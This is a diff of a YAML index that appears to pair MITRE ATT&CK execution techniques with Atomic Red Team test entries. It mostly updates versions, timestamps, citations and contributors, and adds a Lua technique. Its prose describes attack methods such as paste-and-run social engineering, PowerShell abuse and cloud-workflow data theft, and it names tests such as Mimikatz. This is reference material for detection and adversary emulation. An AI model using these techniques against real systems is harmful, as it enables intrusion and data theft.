-        Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        Adversaries may also deceive users into performing actions such as:
+
+        * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+        * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+        * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
 
         For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
       kill_chain_phases:
@@ -44726,7 +45035,11 @@ execution:
         phase_name: execution
       x_mitre_contributors:
       - Oleg Skulkin, Group-IB
-      - Goldstein Menachem
+      - Menachem Goldstein
+      - Harikrishnan Muthu, Cyble
+      - ReliaQuest
+      - Ale Houspanossian
+      - Fernando Bacchin
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -44741,7 +45054,7 @@ execution:
       - macOS
       - IaaS
       - Containers
-      x_mitre_version: '1.6'
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Instance: Instance Start'
       - 'File: File Creation'
@@ -44768,6 +45081,10 @@ execution:
         description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
           Bookmarks. Retrieved January 2, 2024.
         url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+      - source_name: Reliaquest-execution
+        description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+          Campaign. Retrieved August 2, 2024.
+        url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
       - source_name: Telephone Attack Delivery
         description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
           4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -44778,15 +45095,19 @@ execution:
           API forms and more to scam users in popular online game “Roblox”. Retrieved
           January 2, 2024.
         url: https://blog.talosintelligence.com/roblox-scam-overview/
+      - source_name: proofpoint-selfpwn
+        description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+          From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+          2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -44803,7 +45124,7 @@ execution:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -44851,7 +45172,7 @@ execution:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -44884,7 +45205,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests:
     - name: Radmin Viewer Utility
@@ -44994,7 +45314,7 @@ execution:
           choco install -y 7zip
   T1059.001:
     technique:
-      modified: '2024-03-01T18:01:37.575Z'
+      modified: '2024-10-15T16:39:13.228Z'
       name: 'Command and Scripting Interpreter: PowerShell'
       description: |-
         Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -45055,8 +45375,9 @@ execution:
           POWERSHELL LOGGING. Retrieved February 16, 2016.
         url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
       - source_name: Github PSAttack
-        description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
-        url: https://github.com/jaredhaight/PSAttack
+        description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+          2024.
+        url: https://github.com/Exploit-install/PSAttack-1
       - source_name: inv_ps_attacks
         description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
           Retrieved December 1, 2021.
@@ -45078,7 +45399,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.001
     atomic_tests:
     - name: Mimikatz
@@ -45627,7 +45947,7 @@ execution:
         name: powershell
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -45705,14 +46025,13 @@ execution:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1059.004:
     technique:
-      modified: '2024-04-16T12:24:40.163Z'
+      modified: '2024-10-15T15:17:19.136Z'
       name: 'Command and Scripting Interpreter: Bash'
       description: |-
         Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -45770,36 +46089,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.004
     atomic_tests: []
   T1559:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
-      type: attack-pattern
-      created: '2020-02-12T14:08:48.689Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1559
-        url: https://attack.mitre.org/techniques/T1559
-      - source_name: Linux IPC
-        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
-        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
-          March 11, 2022.
-      - source_name: Fireeye Hunting COM June 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
-        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
-          10, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-10T19:06:35.666Z'
       name: Inter-Process Communication
       description: "Adversaries may abuse inter-process communication (IPC) mechanisms
         for local code or command execution. IPC is typically used by processes to
@@ -45820,23 +46114,44 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
         or spawned processes that are associated with abuse of IPC mechanisms.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Process: Process Access'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      - SYSTEM
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+      created: '2020-02-12T14:08:48.689Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1559
+        external_id: T1559
+      - source_name: Fireeye Hunting COM June 2019
+        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+          10, 2019.
+        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+      - source_name: Linux IPC
+        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+          March 11, 2022.
+        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1559
     atomic_tests:
     - name: Cobalt Strike Artifact Kit pipe
@@ -45994,6 +46309,70 @@ execution:
 
           '
         name: command_prompt
+  T1059.011:
+    technique:
+      modified: '2024-10-01T15:19:54.163Z'
+      name: Lua
+      description: |-
+        Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>).(Citation: Lua main page)(Citation: Lua state)
+
+        Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Script: Script Execution'
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+      created: '2024-08-05T18:19:42.201Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/011
+        external_id: T1059.011
+      - source_name: Kaspersky Lua
+        description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+          APT. Retrieved August 5, 2024.
+        url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+      - source_name: Lua main page
+        description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+        url: https://www.lua.org/start.html
+      - source_name: Lua state
+        description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+        url: https://pgl.yoyo.org/luai/i/lua_State
+      - source_name: Cyphort EvilBunny
+        description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+          Instrumented By Lua. Retrieved August 5, 2024.'
+        url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+      - source_name: PoetRat Lua
+        description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+          public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+        url: https://blog.talosintelligence.com/poetrat-update/
+      - source_name: Lua Proofpoint Sunseed
+        description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+          Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+          Malware to Target European Governments and Refugee Movement. Retrieved August
+          5, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -46022,7 +46401,7 @@ execution:
         url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
         description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
           Supply Chain and Infrastructure. Retrieved August 26, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-26T16:42:35.318Z'
       name: 'User Execution: Malicious Image'
       description: |-
         Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
@@ -46049,8 +46428,6 @@ execution:
       - 'Instance: Instance Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1204.003
     atomic_tests:
     - name: Malicious Execution from Mounted ISO Image
@@ -46073,24 +46450,8 @@ execution:
         elevation_required: true
   T1203:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
-      created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1203
-        url: https://attack.mitre.org/techniques/T1203
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:34:23.908Z'
+      name: Exploitation for Client Execution
       description: |-
         Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
 
@@ -46107,9 +46468,10 @@ execution:
         ### Common Third-party Applications
 
         Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Exploitation for Client Execution
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Detecting software exploitation may be difficult depending
         on the tools available. Also look for behavior on the endpoint system that
         might indicate successful compromise, such as abnormal behavior of the browser
@@ -46117,21 +46479,37 @@ execution:
         evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
         for attempts to hide execution, evidence of Discovery, or other unusual network
         traffic that may indicate additional tools transferred to the system.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: execution
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
+      - 'File: File Modification'
       - 'Application Log: Application Log Content'
+      - 'Network Traffic: Network Traffic Flow'
+      x_mitre_remote_support: false
       x_mitre_system_requirements:
       - Remote exploitation for execution requires a remotely accessible service reachable
         over the network or other vector of access such as spearphishing or drive-by
         compromise.
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+      created: '2018-04-18T17:59:24.739Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1203
+        external_id: T1203
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.006:
     technique:
@@ -46181,28 +46559,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.006
     atomic_tests: []
   T1569:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
-      type: attack-pattern
-      created: '2020-03-10T18:23:06.482Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569
-        url: https://attack.mitre.org/techniques/T1569
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-20T19:55:40.527Z'
       name: System Services
       description: Adversaries may abuse system services or daemons to execute commands
         or programs. Adversaries can execute malicious content by interacting with
@@ -46213,32 +46574,44 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for command line invocations of tools capable of
         modifying services that doesn’t correspond to normal usage patterns and known
         software, patch cycles, etc. Also monitor for changes to executables and other
         files associated with services. Changes to Windows services may also be reflected
         in the Registry.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
       - 'Service: Service Creation'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      - root
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+      created: '2020-03-10T18:23:06.482Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569
+        external_id: T1569
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1059.003:
     technique:
-      modified: '2024-03-01T17:35:02.889Z'
+      modified: '2024-10-15T15:19:56.540Z'
       name: 'Command and Scripting Interpreter: Windows Command Shell'
       description: |-
         Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -46281,7 +46654,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.003
     atomic_tests:
     - name: Create and Execute Batch Script
@@ -46460,7 +46832,7 @@ execution:
         elevation_required: true
   T1651:
     technique:
-      modified: '2024-04-12T03:27:48.171Z'
+      modified: '2024-10-15T13:42:42.543Z'
       name: Cloud Administration Command
       description: |-
         Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -46517,11 +46889,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:43:27.104Z'
       name: 'Command and Scripting Interpreter: Visual Basic'
       description: |-
         Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -46586,9 +46957,8 @@ execution:
         url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.005
     atomic_tests:
     - name: Visual Basic script execution to gather local computer information
@@ -46696,7 +47066,7 @@ execution:
         name: powershell
   T1648:
     technique:
-      modified: '2024-03-05T16:13:38.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Serverless Execution
       description: "Adversaries may abuse serverless computing, integration, and automation
         services to execute arbitrary code in cloud environments. Many cloud providers
@@ -46717,14 +47087,19 @@ execution:
         an adversary may create a Lambda function that automatically adds [Additional
         Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
         and a corresponding CloudWatch events rule that invokes that function whenever
-        a new user is created.(Citation: Backdooring an AWS account) Similarly, an
-        adversary may create a Power Automate workflow in Office 365 environments
-        that forwards all emails a user receives or creates anonymous sharing links
-        whenever a user is granted access to a document in SharePoint.(Citation: Varonis
-        Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+        a new user is created.(Citation: Backdooring an AWS account) This is also
+        possible in many cloud-based office application suites. For example, in Microsoft
+        365 environments, an adversary may create a Power Automate workflow that forwards
+        all emails a user receives or creates anonymous sharing links whenever a user
+        is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+        Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+        environments, they may instead create an Apps Script that exfiltrates a user's
+        data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+        OWN-CERT Google App Script 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
       - Praetorian
@@ -46733,16 +47108,18 @@ execution:
       - Varonis Threat Labs
       - Alex Soler, AttackIQ
       - Vectra AI
+      - OWN
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'Application Log: Application Log Content'
@@ -46768,6 +47145,14 @@ execution:
         description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
           Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
         url: https://www.varonis.com/blog/power-automate-data-exfiltration
+      - source_name: Cloud Hack Tricks GWS Apps Script
+        description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+          2024.
+        url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+      - source_name: OWN-CERT Google App Script 2024
+        description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+          analysis. Retrieved October 2, 2024.
+        url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
       - source_name: Cado Security Denonia
         description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
           Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -46782,29 +47167,10 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
-      type: attack-pattern
-      created: '2020-03-11T14:43:31.706Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1204.001
-        url: https://attack.mitre.org/techniques/T1204/001
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-10T16:40:03.786Z'
       name: Malicious Link
       description: An adversary may rely upon a user clicking a malicious link in
         order to gain execution. Users may be subjected to social engineering to get
@@ -46817,25 +47183,41 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
